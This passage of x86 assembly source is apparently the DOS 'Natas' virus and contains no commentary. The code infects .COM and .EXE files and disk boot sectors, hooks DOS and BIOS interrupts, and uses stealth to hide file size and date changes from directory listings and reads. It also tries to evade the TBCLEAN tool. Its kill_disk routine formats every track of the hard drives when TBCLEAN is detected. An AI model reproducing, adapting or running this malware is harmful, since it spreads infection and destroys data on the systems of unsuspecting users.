old_di          =       word ptr $ - 2
                iret

;=====( file infections come here after decryption )=========================;

file_start:     push    ds                      ; save PSP segment
                call    $ + 3
                pop     si
                sub     si,offset $ - 1
                call    anti_tbclean            ; disable TBCLEAN
                or      bp,bp                   ; TBCLEAN active?
                jne     go_res
                mov     ah,30h
                mov     bx,-666h
                int     21h
                cmp     al,3h                   ; must be DOS 3+
                jb      jump_host
go_res:         mov     ax,es
                dec     ax
                mov     ds,ax
                xor     di,di
                or      bp,bp                   ; TBCLEAN here?
                jne     dont_check_mcb
                cmp     byte ptr ds:[di],'Z'    ; Last Block?
                jne     jump_host
dont_check_mcb: mov     ax,para_size
                sub     ds:[di + 3],ax          ; from MCB
                sub     ds:[di + 12h],ax        ; from PSP
                mov     es,ds:[di + 12h]        ; get memory address
                mov     ds,di
                sub     word ptr ds:[413h],kilo_size ; from int 12h
                mov     cx,jump_code_13-v_start
                cld
                rep     movs byte ptr es:[di],byte ptr cs:[si]  
                mov     ax,offset high_code
                push    es ax
                retf

jump_host:      push    cs
                pop     ds
                pop     es                      ; PSP segment
                lea     si,ds:[si + header]     ; get address of header
                mov     ax,ds:[si]              ; get 1st instruction
                cmp     ax,'ZM'                 ; EXE?
                je      jump_2_exe
                cmp     ax,'MZ'                 ; EXE?
                je      jump_2_exe
                mov     cx,18h / 2
                mov     di,100h
                push    es di
                cld
                rep     movsw                   ; repair .COM file
                push    es
                pop     ds
                xchg    ax,cx
                retf
                
jump_2_exe:     mov     ax,es
                add     ax,10h
                add     ds:[si.eh_cs],ax
                add     ax,ds:[si.eh_ss]        ; get SS/CS
                push    es
                pop     ds
                cli
                mov     ss,ax
                mov     sp,cs:[si.eh_sp]
                xor     ax,ax
                sti
                jmp     dword ptr cs:[si.eh_ip]


high_code:      push    cs
                pop     ds
                mov     byte ptr ds:[di+origin-jump_code_13],file ; tunnel      
                mov     ax,2
                call    random                  ; 1 in 3 chance of no stealth
                                                ; on special programs
                mov     ds:check_special,al
                mov     ds:hook_21,no_hook_21   ; dont hook int 21h
                mov     al,0eah
                stosb                           ; store at jump_code_13
                mov     ds:[di+4],al
                mov     ax,offset new_13
                stosw
                mov     word ptr ds:[di+3],offset new_21
                mov     ds:[di],cs
                mov     ds:[di+5],cs
                push    di
                call    find_ints               ; trace interrupts
                pop     di
                push    cs
                pop     ds
                mov     ax,ds:dos_seg
                cmp     word ptr ds:[di+(dos_13+2)-(jump_code_13+3)],ax 
                                                ; found DOS' int 13h?
                ja      call_inf_hard
                cmp     word ptr ds:[di+(int_21+2)-(jump_code_13+3)],ax            
                                                ; found DOS' int 21h?
                ja      call_inf_hard
                call    swap_13
                call    swap_21                 ; insert jumps into DOS
call_inf_hard:  call    inf_hard                ; infect drive C:
                or      bp,bp                   ; ZF -> No TBCLEAN
                mov     si,bp                   ; SI=0 if goto jump_host
                jne     kill_disk
                jmp     jump_host

kill_disk:      xor     bx,bx
                mov     es,bx                   ; table to use for format
                mov     dl,80h                  ; Drive C:
kill_next_disk: xor     dh,dh                   ; head 0
kill_next_track:xor     cx,cx                   ; track 0             
kill_format:    mov     ax,501h
                call    call_disk               ; format track
                and     cl,11000000b
                inc     ch                      ; next track low
                jne     kill_format
                add     cl,40h                  ; next track high
                jne     kill_format
                xor     ah,ah
                int     13h                     ; reset disk
                inc     dh                      ; next head
                cmp     dh,10h
                jb      kill_next_track
                inc     dx                      ; next drive
                jmp     kill_next_disk

;=====( Interrupt 13h handler )==============================================;

new_13:         jmp     $
hook_21         =       byte ptr $ - 1

check_21:       call    push_all
                mov     al,21h
                call    get_int                 ; get int 21h address
                mov     ax,es
                push    cs cs
                pop     ds es
                cmp     ax,800h                 ; too high?
                ja      cant_hook_21
                mov     di,offset int_21 + 2
                std
                xchg    ax,ds:[di]              ; swap addresses
                scasw                           ; did it change?
                je      cant_hook_21
                mov     ds:[di],bx
                mov     al,21h
                mov     dx,offset new_21
                call    set_int                 ; hook int 21h
                mov     ds:hook_21,no_hook_21
cant_hook_21:   call    pop_all

new_13_next:    cmp     ah,2h                   ; Read?
                jne     jump_13
                cmp     cx,1                    ; track 0, sector 1?
                jne     jump_13
                or      dh,dh                   ; head 0?
                je      hide_boot
jump_13:        call    call_dos_13
                retf    2h


hide_boot:      call    call_dos_13             ; read boot sector
                call    push_all
                jb      hide_boot_err
                push    es cs
                pop     es ds
                mov     cx,100h
                mov     si,bx
                mov     di,offset disk_buff
                mov     bx,di
                cld
                rep     movsw                   ; copy boot sector to buffer
                push    cs
                pop     ds
                call    find_boot               ; find start/already infected?
                jne     inf_boot
                mov     ax,201h
                mov     cx,ds:[si+load_sect-loader]
                mov     dh,byte ptr ds:[si+(load_head+1)-loader]
                                                ; get code location
                call    call_disk               ; read virus code
                jb      hide_boot_err
                mov     ax,ds:[0]
                cmp     ds:[bx],ax              ; verify infection
                jne     hide_boot_err
                mov     di,ss:[bp.reg_bx]
                mov     es,ss:[bp.reg_es]       ; get caller's buffer
                sub     si,bx                   ; displacement into boot sect.
                add     di,si                   ; address of loader
                lea     si,ds:[bx+(boot_code-v_start)] ; boot code in virus
                call    move_boot_code1         ; hide infection
hide_boot_err:  call    pop_all
                retf    2h

inf_boot:       cmp     dl,80h                  ; hard disk?
                jnb     hide_boot_err
                mov     ax,301h
                mov     cx,1
                call    call_disk               ; Write boot sector to disk
                                                ; CY -> Write-Protected
                jb      hide_boot_err
                mov     si,dx                   ; save drive #
                mov     di,bx
                mov     ax,ds:[di.bs_sectors]   ; get number of sectors
                mov     cx,ds:[di.bs_sectors_per_track]
                sub     ds:[di.bs_sectors],cx   ; prevent overwriting of code
                mov     ds:hide_count,cx
                xor     dx,dx
                or      ax,ax                   ; error?
                je      hide_boot_err
                jcxz    hide_boot_err
                div     cx
                or      dx,dx                   ; even division?
                jne     hide_boot_err
                mov     bx,ds:[di.bs_heads]     ; get number of heads
                or      bx,bx
                je      hide_boot_err
                div     bx
                or      dx,dx
                jne     hide_boot_err
                dec     ax
                mov     ch,al                   ; last track
                mov     cl,1                    ; sector 1
                dec     bx
                mov     dx,si                   ; drive
                mov     dh,bl                   ; last head
                mov     bx,di                   ; offset disk buffer
                call    copy_loader             ; Copy loader into Boot sector
                jb      hide_boot_err
                mov     ax,300h + sect_size
                xor     bx,bx
                call    call_disk
                jb      hide_boot_err
                mov     ax,301h
                mov     bx,offset disk_buff
                mov     cx,1
                xor     dh,dh
                call    call_disk               ; write boot sector to disk
                mov     bx,ss:[bp.reg_bx]
                mov     ds,ss:[bp.reg_es]       ; get caller's buffer
                sub     ds:[bx.bs_sectors],9ffh ; prevent overwriting of code
hide_count      =       word ptr $ - 2
                jmp     hide_boot_err

;=====( Interrupt 21h handler )==============================================;

new_21:         cli
                mov     cs:int_21_ss,ss
                mov     cs:int_21_sp,sp         ; save stack pointers
                push    cs
                pop     ss
                mov     sp,offset temp_stack    ; allocate stack
                sti
                call    push_all
                in      al,21h
                or      al,2                    ; disable keyboard
                out     21h,al
                push    cs
                pop     ds
                mov     di,offset new_24
                mov     word ptr ds:[di-(new_24-handle)],bx ; save handle
                mov     al,24h
                call    get_int                 ; get address of int 24h
                mov     word ptr ds:[di-(new_24-int_24)],bx
                mov     word ptr ds:[di-(new_24-(int_24+2))],es
                mov     word ptr ds:[di],03b0h  ; MOV AL,3
                mov     byte ptr ds:[di+2],0cfh ; IRET
                mov     dx,di
                call    set_int                 ; hook int 24h
                call    pop_all
                call    swap_21                 ; remove jump from int 21h
                call    push_all
                cmp     ah,30h                  ; get DOS version?
                jne     is_dir_fcb
                add     bx,666h                 ; looking for us?
                jnz     is_dir_fcb
                mov     ss:[bp.reg_ax],bx       ; set DOS version=0
                mov     ss:[bp.reg_bx],bx
                jmp     retf_21

is_dir_fcb:     cmp     ah,11h
                jb      is_dir_asciiz
                cmp     ah,12h
                ja      is_dir_asciiz
                call    call_21                 ; do find
                or      al,al                   ; error?
                je      dir_fcb
                jmp     jump_21

dir_fcb:        call    save_returns            ; save AX
                call    get_psp                 ; get current PSP
                mov     ax,'HC'
                scasw                           ; CHKDSK?
                jne     dir_fcb_ok
                mov     ax,'DK'
                scasw
                jne     dir_fcb_ok
                mov     ax,'KS'
                scasw
                je      retf_21
dir_fcb_ok:     call    get_dta                 ; get DTA address
                xor     di,di
                cmp     byte ptr ds:[bx],-1     ; extended FCB?
                jne     dir_fcb_next
                mov     di,7h                   ; fix it up
dir_fcb_next:   lea     si,ds:[bx+di.ds_date+1] ; offset of year -> SI
dir_hide:       call    is_specialfile          ; no stealth if helper
                je      retf_21
                cmp     byte ptr ds:[si],years  ; infected?
                jc      retf_21
                sub     byte ptr ds:[si],years  ; restore old date
                les     ax,ds:[bx+di.ds_size]   ; get size of file
                mov     cx,es
                sub     ax,file_size            ; hide size increase
                sbb     cx,0
                jc      retf_21
                mov     word ptr ds:[bx+di.ds_size],ax
                mov     word ptr ds:[bx+di.ds_size+2],cx ; save new size
retf_21:        call    undo_24                 ; unhook int 24h
                call    pop_all
                call    swap_21                 ; insert jump
                cli
                mov     ss,cs:int_21_ss
                mov     sp,cs:int_21_sp
                sti
                retf    2

                
is_dir_asciiz:  cmp     ah,4eh
                jb      is_lseek
                cmp     ah,4fh
                ja      is_lseek
                call    call_21
                jnc     dir_asciiz    
go_jump_21:     jmp     jump_21

dir_asciiz:     call    save_returns            ; save AX and flags
                call    get_dta                 ; get dta address
                mov     di,-3
                lea     si,ds:[bx.dta_date+1]   ; get year address
                jmp     dir_hide

is_lseek:       cmp     ax,4202h                ; Lseek to end?
                jne     is_date
                call    call_21_file
                jb      go_jump_21
                call    get_dcb                 ; get DCB address
                jbe     lseek_exit
                call    is_specialfile          ; dont hide true size from
                                                ; helpers
                je      lseek_exit
                sub     ax,file_size
                sbb     dx,0                    ; hide virus at end
                mov     word ptr ds:[di.dcb_pos],ax
                mov     word ptr ds:[di.dcb_pos+2],dx ; set position in DCB
lseek_exit:     clc
                call    save_returns            ; save AX/flags
                mov     ss:[bp.reg_dx],dx
                jmp     retf_21

is_date:        cmp     ax,5700h                ; get date?
                je      get_date
                cmp     ax,5701h                ; set date?
                jne     is_read
                call    get_dcb
                jbe     date_err
                cmp     dh,years                ; already setting 100 years?
                jnb     date_err
                add     dh,years                ; dont erase marker
get_date:       call    is_specialfile          ; do not hide date for
                                                ; helpers
                je      date_err
                call    call_21_file            ; get/set date
                jnc     date_check
date_err:       jmp     jump_21

date_check:     cmp     dh,years                ; infected?
                jb      date_ok
                sub     dh,years
date_ok:        clc
                call    save_returns            ; save ax/flags
                mov     ss:[bp.reg_cx],cx
                mov     ss:[bp.reg_dx],dx       ; save time/date
                jmp     retf_21
                
is_read:        cmp     ah,3fh                  ; reading file?
                je      do_read
no_read:        jmp     is_write

do_read:        call    get_dcb                 ; get DCB address
                jbe     no_read
                call    is_specialfile
                je      no_read
                les     ax,ds:[di.dcb_size]     ; get size of file                                
                mov     bx,es
                les     dx,ds:[di.dcb_pos]      ; get current position
                mov     si,es
                and     cs:read_bytes,0
                or      si,si                   ; in 1st 64k?
                jnz     read_high
                cmp     dx,18h                  ; reading header?
                jnb     read_high
                push    cx
                add     cx,dx
                cmc
                jnc     read_above
                cmp     cx,18h                  ; read goes above header?
read_above:     pop     cx
                jb      read_below
                mov     cx,18h
                sub     cx,dx
read_below:     push    ax bx                   ; save size
                push    dx                      ; position
                sub     dx,18h
                add     ax,dx                   ; get position in header
                cmc
                sbb     bx,si
                xchg    word ptr ds:[di.dcb_pos],ax
                xchg    word ptr ds:[di.dcb_pos+2],bx ; lseek to header
                push    ax bx
                push    ds
                mov     ah,3fh                
                mov     dx,ss:[bp.reg_dx]
                mov     ds,ss:[bp.reg_ds]
                call    call_21_file            ; read file
                pop     ds
                pop     word ptr ds:[di.dcb_pos+2]
                pop     word ptr ds:[di.dcb_pos]
                pop     dx
                pushf
                add     dx,ax                   ; adjust position
                add     cs:read_bytes,ax        ; remember # of bytes read
                popf
                pop     bx ax
                jnc     read_high
                jmp     jump_21

read_high:      mov     word ptr ds:[di.dcb_pos],dx ; update position
                mov     word ptr ds:[di.dcb_pos+2],si
                mov     cx,ss:[bp.reg_cx]       ; number of bytes to read
                sub     cx,cs:read_bytes
                sub     ax,file_size
                sbb     bx,0                    ; get original size
                push    ax bx
                sub     ax,dx
                sbb     bx,si                   ; in virus now?
                pop     bx ax
                jnc     read_into
                xor     cx,cx                   ; read 0 bytes
                jmp     read_fake

read_into:      add     dx,cx
                adc     si,0                    ; get position after read
                cmp     bx,si                   ; read extends into virus?
                ja      read_fake
                jb      read_adjust
                cmp     ax,dx
                jnb     read_fake
read_adjust:    sub     dx,cx                   ; get position again
                xchg    cx,ax
                sub     cx,dx   ; # of bytes to read = Original size - Pos
read_fake:      mov     ah,3fh
                mov     dx,ss:[bp.reg_dx]
                add     dx,cs:read_bytes
                mov     ds,ss:[bp.reg_ds]
                call    call_21_file            ; read file
                jc      read_exit
                add     ax,0
read_bytes      =       word ptr $ - 2
                clc
read_exit:      call    save_returns
                jmp     retf_21
                

is_write:       cmp     ah,40h                  ; write?
                je      do_write
no_write:       jmp     is_infect

do_write:       call    get_dcb
                jbe     no_write
                les     ax,ds:[di.dcb_size]     ; get file size
                mov     bx,es
                sub     ax,18h
                sbb     bx,0                    ; get header position
                xchg    ax,word ptr ds:[di.dcb_pos]
                xchg    bx,word ptr ds:[di.dcb_pos+2] ; lseek to header
                push    ax bx
                mov     ax,2
                xchg    ax,ds:[di.dcb_mode]     ; read/write mode
                push    ax
                push    ds cs
                pop     ds es
                call    read_header             ; read 18h bytes
                pop     es:[di.dcb_mode]        ; restore access mode
                jc      write_rest_pos
                mov     word ptr es:[di.dcb_pos],ax
                mov     word ptr es:[di.dcb_pos+2],ax ; lseek to start
                call    write_header                  ; write old header
                jc      write_rest_pos
                push    es
                pop     ds
                sub     word ptr ds:[di.dcb_size],file_size
                sbb     word ptr ds:[di.dcb_size+2],ax    ; truncate at virus
                sub     byte ptr ds:[di.dcb_date+1],years ; remove 100 years
write_rest_pos: pop     word ptr es:[di.dcb_pos+2]
                pop     word ptr es:[di.dcb_pos]
                jmp     jump_21


is_infect:      cmp     ah,3eh                  ; Close?
                je      infect_3e
                cmp     ax,4b00h                ; Execute?
                je      infect_4b
                jmp     jump_21

infect_4b:      mov     ax,3d00h                ; Open file
                cmp     ax,0
                org     $ - 2
infect_3e:      mov     ah,45h                  ; Duplicate handle
                call    int_2_bios              ; lock out protection programs
                call    call_21_file            ; get handle
                mov     cs:handle,ax
                mov     ax,4408h
                cwd
                jc      undo_bios
                call    get_dcb                 ; get DCB for handle
                jb      cant_infect
                jne     cant_infect             ; error/already infected
                mov     bl,00111111b
                and     bl,byte ptr ds:[di.dcb_dev_attr] ; get drive code
                mov     dl,bl                   ; DX=00**
                inc     bx                      ; 0=default,1=a,2=b,3=c,etc.
                call    call_21                 ; drive removable?
                mov     cx,1h
                push    cs
                pop     es
                jc      test_prot_drive
                dec     ax                      ; 1=non-removable
                jz      no_protect
                jmp     test_protect

test_prot_drive:cmp     dl,1                    ; A or B?
                ja      no_protect
test_protect:   mov     ax,201h
                mov     bx,offset disk_buff
                int     13h                     ; read sector
                jc      cant_infect
                mov     ax,301h
                int     13h                     ; write it back
                jc      cant_infect
no_protect:     inc     cx                      ; CX=2
                xchg    cx,ds:[di.dcb_mode]     ; read/write access mode
                push    cx
                xor     ax,ax
                xchg    ah,ds:[di.dcb_attr]     ; attribute=0
                test    ah,00000100b            ; system file?
                push    ax
                jne     cant_system
                cbw
                cwd
                xchg    ax,word ptr ds:[di.dcb_pos]
                xchg    dx,word ptr ds:[di.dcb_pos+2] ; lseek to 0
                push    ax dx
                mov     bp,-'OC'
                add     bp,word ptr ds:[di.dcb_ext]   ; BP=0 of CO
                jnz     not_com
                mov     bp,-'MO'
                add     bp,word ptr ds:[di.dcb_ext+1] ; BP=0 if OM
not_com:        call    infect
                pushf
                call    get_dcb
                popf
                jc      not_infected
                add     byte ptr ds:[di.dcb_date+1],years   ; add 100 years
not_infected:   or      byte ptr ds:[di.dcb_dev_attr+1],40h ; no time/date
                pop     word ptr ds:[di.dcb_pos+2]
                pop     word ptr ds:[di.dcb_pos]
cant_system:    pop     word ptr ds:[di.dcb_attr-1] ; restore attribute
                pop     ds:[di.dcb_mode]        ; restore access mode
cant_infect:    mov     ah,3eh
                call    call_21_file            ; close file
undo_bios:      call    int_2_bios              ; restore interrupts
                
;=====( Jump on to int 21h )=================================================;

jump_21:        call    undo_24                 ; unhook int 24h
                push    cs
                pop     ds
                mov     al,1h
                mov     di,offset int_1
                cmp     byte ptr ds:[di+origin-int_1],al ; file origin?
                jne     jump_21_1
                call    get_int                 ; get int 1h address
                mov     ds:[di],bx
                mov     ds:[di + 2],es
                mov     byte ptr ds:[di+inst_count-int_1],5
                mov     ds:trace_mode,step_21
                mov     dx,offset tracer
                call    set_int                 ; hook int 1h
                call    pop_all
                push    si
                pushf
                pop     si
                call    si_tf                   ; set TF
                pop     si
go_21:          cli
                mov     ss,cs:int_21_ss
                mov     sp,cs:int_21_sp         ; restore stack
                sti
go_2_21:        jmp     cs:int_21
                
jump_21_1:      call    pop_all
                jmp     go_21

;=====( actual infection routine )===========================================;

infect:         push    cs
                pop     ds
                call    read_header             ; read first 18h bytes
                jc      inf_bad_file
                mov     si,dx
                mov     di,offset work_header
                cld
                rep     movsb                   ; copy header to work_header
                call    get_dcb
                les     ax,ds:[di.dcb_size]     ; get file size
                mov     dx,es
                mov     word ptr ds:[di.dcb_pos],ax
                mov     word ptr ds:[di.dcb_pos+2],dx ; lseek to end
                push    cs cs
                pop     es ds
                mov     cx,ds:[si]              ; get first 2 bytes
                cmp     cx,'MZ'                 ; .EXE file?
                je      inf_exe
                cmp     cx,'ZM'                 ; .EXE file?
                je      inf_exe
                or      dx,bp                   ; COM file and < 64k?
                jnz     inf_bad_file
                cmp     ax,0-(file_size+100)
                ja      inf_bad_file
                cmp     ax,1000
                jb      inf_bad_file
                mov     byte ptr ds:[si],0e9h   ; build jump
                inc     ah                      ; Add PSP size (100h)
                push    ax                      ; save IP for engine
                add     ax,offset decrypt-103h  ; get jump disp. (- PSP size)
                mov     ds:[si+1],ax
                jmp     append_vir

inf_bad_file:   stc
                retn

inf_exe:        cmp     word ptr ds:[si.eh_max_mem],-1
                jne     inf_bad_file
                mov     bp,ax
                mov     di,dx                   ; save size in DI:BP
                mov     cx,200h
                div     cx                      ; divide into pages
                or      dx,dx                   ; Any remainder?
                jz      no_round
                inc     ax
no_round:       sub     ax,ds:[si.eh_size]      ; size same as header says?
                jne     inf_bad_file
                sub     dx,ds:[si.eh_modulo]
                jne     inf_bad_file
                mov     ax,file_size            ; virus size
                add     ax,bp
                adc     dx,di                   ; + program size
                div     cx                      ; / 512
                or      dx,dx                   ; round up?
                jz      no_round1
                inc     ax
no_round1:      mov     ds:[si.eh_size],ax
                mov     ds:[si.eh_modulo],dx    ; set new size
                mov     bx,0-(file_size+1000)
                xor     cx,cx
get_exe_ip:     cmp     bp,bx                   ; make sure virus does not
                                                ; cross segments
                jb      got_exe_ip
                sub     bp,10h                  ; down 10h bytes
                loop    get_exe_ip              ; up 1 paragraph
got_exe_ip:     cmp     di,0fh
                ja      inf_bad_file
                xchg    cx,ax
                mov     cl,4
                ror     di,cl                   ; get segment displacement
                or      ax,ax
                jz      no_para_add
                sub     di,ax                   ; Add segments from LOOP
                jnc     inf_bad_file
no_para_add:    sub     di,ds:[si.eh_size_header] ; CS-header size in 
                                                ; paragraphs
                push    bp                      ; save offset of v_start
                add     bp,decrypt-v_start
                mov     ds:[si.eh_ip],bp        ; set IP
                mov     ds:[si.eh_cs],di        ; set CS
                add     bp,512                  ; 512 bytes of stack
                mov     ds:[si.eh_sp],bp        ; set SP
                mov     ds:[si.eh_ss],di        ; set SS
                mov     bp,8000h                ; Tell engine "Exe file"
                sar     bx,cl                   ; 0 - ((file_size+1000h)/16)
                mov     ax,ds:[si.eh_min_mem]
                sub     ax,bx                   ; add file_size+1000h/16
                jnb     append_vir
                mov     ds:[si.eh_min_mem],ax

append_vir:     pop     ax
                call    engine                  ; encrypt/write/decrypt
                push    bp             
                popf
                jc      append_vir_err
                call    get_dcb
                mov     word ptr ds:[di.dcb_pos],cx
                mov     word ptr ds:[di.dcb_pos+2],cx ; lseek to start
                mov     ah,40h
                mov     dx,offset work_header
                push    cs
                pop     ds
                call    header_op               ; write new header to file
append_vir_err: retn
                
;=====( Get DCB address for file )===========================================;

get_dcb:        push    ax bx 
                mov     ax,1220h
                mov     bx,cs:handle            ; get file handle
                int     2fh                     ; get DCB number address
                jc      get_dcb_fail
                mov     ax,1216h
                mov     bl,es:[di]              ; get DCB number
                cmp     bl,-1                   ; Handle Openned?
                cmc
                je      get_dcb_fail
                int     2fh                     ; get DCB address
                jc      get_dcb_fail
                push    es
                pop     ds
                test    byte ptr ds:[di.dcb_dev_attr],80h ; device or file?
                cmc
                jne     get_dcb_fail
                test    byte ptr ds:[di.dcb_date+1],80h ; infected?
get_dcb_fail:   pop     bx ax               
                retn

;=====( Swap original 13h/15h/40h addresses with IVT addresses )=============;

int_2_bios:     push    ax bx dx ds
                mov     al,13h                  ; int 13h
                mov     di,offset int_13
int_2_bios_lp:  push    cs
                pop     ds
                call    get_int                 ; get int address               
                mov     dx,es
                xchg    bx,ds:[di]              ; swap offsets
                cld
                scasw
                xchg    dx,bx
                xchg    bx,ds:[di]              ; swap segments
                scasw
                mov     ds,bx                   ; DS:DX=new address
                call    set_int                 ; set int to DS:DX
                cmp     al,15h                  
                mov     al,15h
                jnb     int_2_bios_40           ; CY AL=13h
                add     di,4
                jmp     int_2_bios_lp

int_2_bios_40:  mov     al,40h
                je      int_2_bios_lp           ; ZR AL=15h else AL=40h, exit
                pop     ds dx bx ax
                retn

;=====( Read/write header to file )==========================================;

read_header:    mov     ah,3fh
                cmp     ax,0
                org     $ - 2
write_header:   mov     ah,40h
                mov     dx,offset header
header_op:      mov     cx,18h
                call    call_21_file             ; read/write header
                jc      read_write_err
                sub     ax,cx
read_write_err: retn

;=====( Unhook int 24h )=====================================================;

undo_24:        mov     al,24h
                lds     dx,cs:int_24
                call    set_int                 ; unhook int 24h
                in      al,21h
                and     al,not 2                ; enable keyboard
                out     21h,al
                retn

;=====( Save returns after int 21h call )====================================;

save_returns:   mov     ss:[bp.reg_ax],ax
                pushf
                pop     ss:[bp.reg_f]
                retn

;=====( Return ZF set if ARJ, PKZIP, LHA or MODEM )==========================;

is_specialfile: push    ax cx si di es
                mov     al,0
check_special   =       byte ptr $ - 1
                or      al,al                   ; Check for special?
                jnz     it_is_special
                call    get_psp                 ; get MCB of current PSP
                mov     ax,es:[di]              ; get 1st 2 letters of name
                cmp     ax,'RA'                 ; ARj?
                je      it_is_special
                cmp     ax,'HL'                 ; LHa?
                je      it_is_special
                cmp     ax,'KP'                 ; PKzip?
                je      it_is_special
                mov     cx,2
                mov     si,offset backup
is_it_mod_bak:  push    cx di
                mov     cl,8
                lods    byte ptr cs:[si]        ; get 'B' or 'M'
                xor     al,66h + 6h             ; decrypt
                repne   scasb
                jne     is_it_mod
                cmp     cl,3
                jb      is_it_mod
                mov     cl,4
is_ode_ack:     lods    byte ptr cs:[si]
                xor     al,66h + 6h
                jz      is_it_mod               ; 0 (done)?
                scasb
                loope   is_ode_ack
is_it_mod:      mov     si,offset modem
                pop     di cx
                loopne  is_it_mod_bak
it_is_special:  pop     es di si cx ax
                retn

backup:         db      'B' xor (66h + 6h) 
                db      'A' xor (66h + 6h)
                db      'C' xor (66h + 6h)
                db      'K' xor (66h + 6h)
                db      0   xor (66h + 6h)

modem:          db      'M' xor (66h + 6h)
                db      'O' xor (66h + 6h)
                db      'D' xor (66h + 6h)
                db      'E' xor (66h + 6h)
                db      'M' xor (66h + 6h)


;=====( get current PSP segment )============================================;

get_psp:        push    ax bx
                mov     ah,62h
                call    call_21                 ; get PSP segment
                dec     bx
                mov     es,bx                   ; MCB of current program
                mov     di,8h                   ; offset of file name
                cld
                pop     bx ax
                retn
                
;=====( Get DTA address )====================================================;

get_dta:        mov     ah,2fh
                call    call_21                 ; DTA address into ES:BX
                push    es
                pop     ds
                retn

call_dos_13:    call    swap_13
                pushf
                call    cs:dos_13
                call    swap_13
                retn

call_disk:      test    dl,80h                  ; ZF -> Floppy disk (int 40h)
                je      call_40

call_13:        pushf
                call    cs:int_13
                retn

call_21_file:   mov     bx,0
handle          =       word ptr $ - 2

call_21:        pushf
                push    cs
                call    go_2_21
                retn

call_40:        pushf
                call    cs:int_40
                retn

include eng.asm

                db      "Natas",0

even

decrypt:        mov     word ptr ds:[100h],1f0eh        ; PUSH CS/POP DS
                mov     byte ptr ds:[102h],0e8h         ; CALL
                jmp     file_start
                
                org     decrypt + 150

header          dw      18h / 2 dup(20cdh)

file_end:

work_header     dw      18h / 2 dup(?)
                
write_buff:     db      encode_end-encode dup(?)

int_21_ss       dw      ?
int_21_sp       dw      ?

                dw      256 / 2 dup(?)
temp_stack:            

jump_code_13    db      5 dup(?)
jump_code_21    db      5 dup(?)

int_1           dd      ?
int_24          dd      ?

int_13          dd      ?
dos_13          dd      ?
int_15          dd      ?
int_40          dd      ?
int_21          dd      ?

new_24:         db      3 dup(?)

push_pop_ret    dw      ?

pointer         dw      ?
disp            dw      ?
encode_ptr      dw      ?
encode_enc_ptr  dw      ?

key_reg         db      ?
count_reg       db      ?
ptr_reg         db      ?
ptr_reg1        db      ?
modify_op       db      ?


origin          db      ?
inst_count      db      ?

disk_buff       db      512 dup(?)

v_end:


;=====( Very useful structures )=============================================;



;=====( Memory Control Block structure )=====================================;

mcb             struc
mcb_sig         db      ?               ; 'Z' or 'M'
mcb_owner       dw      ?               ; attribute of owner
mcb_size        dw      ?               ; size of mcb block
mcb_name        db      8 dup(?)        ; file name of owner
mcb             ends


;=====( For functions 11h and 12h )==========================================;


Directory       STRUC
DS_Drive        db ?
DS_Name         db 8 dup(0)
DS_Ext          db 3 dup(0)
DS_Attr         db ?
DS_Reserved     db 10 dup(0)
DS_Time         dw ?
DS_Date         dw ?
DS_Start_Clust  dw ?
DS_Size         dd ?
Directory       ENDS


;=====( for functions 4eh and 4fh )==========================================;


DTA             STRUC
DTA_Reserved    db 21 dup(0)
DTA_Attr        db ?
DTA_Time        dw ?
DTA_Date        dw ?
DTA_Size        dd ?
DTA_Name        db 13 dup(0)
DTA             ENDS


Exe_Header      STRUC
EH_Signature    dw ?                    ; Set to 'MZ' or 'ZM' for .exe files
EH_Modulo       dw ?                    ; remainder of file size/512
EH_Size         dw ?                    ; file size/512
EH_Reloc        dw ?                    ; Number of relocation items
EH_Size_Header  dw ?                    ; Size of header in paragraphs
EH_Min_Mem      dw ?                    ; Minimum paragraphs needed by file
EH_Max_Mem      dw ?                    ; Maximum paragraphs needed by file
EH_SS           dw ?                    ; Stack segment displacement
EH_SP           dw ?                    ; Stack Pointer
EH_Checksum     dw ?                    ; Checksum, not used
EH_IP           dw ?                    ; Instruction Pointer of Exe file
EH_CS           dw ?                    ; Code segment displacement of .exe
eh_1st_reloc    dw      ?               ; first relocation item
eh_ovl          dw      ?               ; overlay number
Exe_Header      ENDS                      

Boot_Sector             STRUC
bs_Jump                 db 3 dup(?)
bs_Oem_Name             db 8 dup(?)
bs_Bytes_Per_Sector     dw ?
bs_Sectors_Per_Cluster  db ?
bs_Reserved_Sectors     dw ?               
bs_FATs                 db ?             ; Number of FATs
bs_Root_Dir_Entries     dw ?             ; Max number of root dir entries
bs_Sectors              dw ?             ; number of sectors; small
bs_Media                db ?             ; Media descriptor byte
bs_Sectors_Per_FAT      dw ?
bs_Sectors_Per_Track    dw ?               
bs_Heads                dw ?             ; number of heads
bs_Hidden_Sectors       dd ?
bs_Huge_Sectors         dd ?             ; number of sectors; large
bs_Drive_Number         db ?
bs_Reserved             db ?
bs_Boot_Signature       db ?
bs_Volume_ID            dd ?
bs_Volume_Label         db 11 dup(?)
bs_File_System_Type     db 8 dup(?)
Boot_Sector             ENDS
                
                
Partition_Table         STRUC
pt_Code                 db 1beh dup(?)  ; partition table code
pt_Status               db ?            ; 0=non-bootable 80h=bootable
pt_Start_Head           db ?            
pt_Start_Sector_Track   dw ?
pt_Type                 db ?            ; 1 = DOS 12bit FAT 4 = DOS 16bit FAT
pt_End_Head             db ?
pt_End_Sector_Track     dw ?
pt_Starting_Abs_Sector  dd ?
pt_Number_Sectors       dd ?
Partition_Table         ENDS


int_1_stack     STRUC
st_ip           dw ?                    ; offset of next instruction after
                                        ; interrupt
st_cs           dw ?                    ; segment of next instruction
st_flags        dw ?                    ; flags when interrupt was called
int_1_stack     ENDS

;----------------------------------------------------------------------------;
;               Dcb description for DOS 3+                                   ;   
;                                                                            ;
;      Offset  Size    Description                                           ;
;       00h    WORD    number of file handles referring to this file         ;
;       02h    WORD    file open mode (see AH=3Dh)                           ;
;              bit 15 set if this file opened via FCB                        ;
;       04h    BYTE    file attribute                                        ;
;       05h    WORD    device info word (see AX=4400h)                       ;
;       07h    DWORD   pointer to device driver header if character device   ;
;              else pointer to DOS Drive Parameter Block (see AH=32h)        ;
;       0Bh    WORD    starting cluster of file                              ;
;       0Dh    WORD    file time in packed format (see AX=5700h)             ;
;       0Fh    WORD    file date in packed format (see AX=5700h)             ;
;       11h    DWORD   file size                                             ;
;       15h    DWORD   current offset in file                                ;
;       19h    WORD    relative cluster within file of last cluster accessed ;
;       1Bh    WORD    absolute cluster number of last cluster accessed      ;
;              0000h if file never read or written???                        ;
;       1Dh    WORD    number of sector containing directory entry           ;
;       1Fh    BYTE    number of dir entry within sector (byte offset/32)    ;
;       20h 11 BYTEs   filename in FCB format (no path/period, blank-padded) ;
;       2Bh    DWORD   (SHARE.EXE) pointer to previous SFT sharing same file ;
